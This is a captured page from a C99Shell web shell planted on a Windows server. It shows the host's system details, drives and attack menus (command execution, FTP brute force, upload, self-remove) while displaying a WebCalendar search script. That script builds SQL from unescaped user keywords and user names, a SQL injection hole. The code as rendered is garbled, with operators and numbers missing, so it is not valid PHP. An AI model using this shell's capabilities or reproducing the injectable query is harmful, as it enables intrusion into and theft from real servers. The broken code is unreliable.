!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\php\OAB\WebCalendar-1.0.2\   drwxrwxrwx
Free 4.09 GB of 39.52 GB (10.36%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     search_handler.php (2.98 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once 'includes/init.php';

$error "";

$keywords getValue "keywords" );
$advanced getValue "advanced" );

if ( 
strlen $keywords ) == )
  
$error translate("You must enter one or more search keywords") . ".";

$matches 0;

$search_others true;

if ( empty ( 
$users ) || empty ( $users[0] ) )
  
$search_others false;
if ( 
$login == "__public__" && $public_access_others != "Y" )
  
$search_others false;
if ( 
$readonly == "Y" || $single_user == "Y" )
  
$search_others false;

print_header();
?>

<h2><?php etranslate("Search Results")?></h2>

<?php
if ( ! empty ( $error ) ) {
  echo 
"<span style=\"font-weight:bold;\">" translate("Error") . ":</span> $error";
} else {
  
$ids = array ();
  
$words split " "$keywords );
  for ( 
$i 0$i count $words ); $i++ ) {
    
// Note: we only search approved events
    
$sql "SELECT webcal_entry.cal_id, webcal_entry.cal_name, " .
      
"webcal_entry.cal_date " .
      
"FROM webcal_entry, webcal_entry_user " .
      
"WHERE webcal_entry.cal_id = webcal_entry_user.cal_id " .
      
"AND webcal_entry_user.cal_status in ('A','W') " .
      
"AND webcal_entry_user.cal_login IN ( ";
    if ( 
$search_others ) {
      if ( empty ( 
$users[0] ) )
        
$users[0] = $login;
      for ( 
$j 0$j count $users ); $j++ ) {
        if ( 
$j )
          
$sql .= ", ";
        
$sql .= " '$users[$j]'";
      }
    } else
      
$sql .= " '$login' ";
    
$sql .= ") ";
    if ( 
$search_others ) {
      
// Don't search confidential entries of other users.
      
$sql .= "AND ( webcal_entry_user.cal_login = '$login' OR " .
        
"( webcal_entry_user.cal_login != '$login' AND " .
    
"webcal_entry.cal_access = 'P' ) ) ";
    }
    
$sql .= "AND ( UPPER(webcal_entry.cal_name) " .
      
"LIKE UPPER('%" .  $words[$i] . "%') " .
      
"OR UPPER(webcal_entry.cal_description) " .
      
"LIKE UPPER('%" .  $words[$i] . "%') ) " .
      
"ORDER BY cal_date";
    
//echo "SQL: $sql<br />";
    
$res dbi_query $sql );
    if ( 
$res ) {
      while ( 
$row dbi_fetch_row $res ) ) {
        
$matches++;
        
$idstr strval $row[0] );
        if ( empty ( 
$ids[$idstr] ) )
          
$ids[$idstr] = 1;
        else
          
$ids[$idstr]++;
        
$info[$idstr] = "$row[1] (" date_to_str ($row[2]) .
          
")";
      }
    }
    
dbi_free_result $res );
  }
}

if ( 
$matches )
  
$matches count $ids );

if ( 
$matches == )
  echo 
"<span style=\"font-weight:bold;\">$matches " translate("match found") . ".</span><br /><br />";
else if ( 
$matches )
  echo 
"<span style=\"font-weight:bold;\">$matches " translate("matches found") . ".</span><br /><br />";
else
  echo 
translate("No matches found") . ".";

// now sort by number of hits
if ( empty ( $error ) ) {
  
arsort $ids );
  echo 
"<ul>\n";
  for ( 
reset $ids ); $key key $ids ); next $ids ) ) {
    echo 
"<li><a class=\"nav\" href=\"view_entry.php?id=$key\">" $info[$key] . "</a></li>\n";
  }
  echo 
"</ul>\n";
}

?>
<br /><br />

<?php print_trailer(); ?>

</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--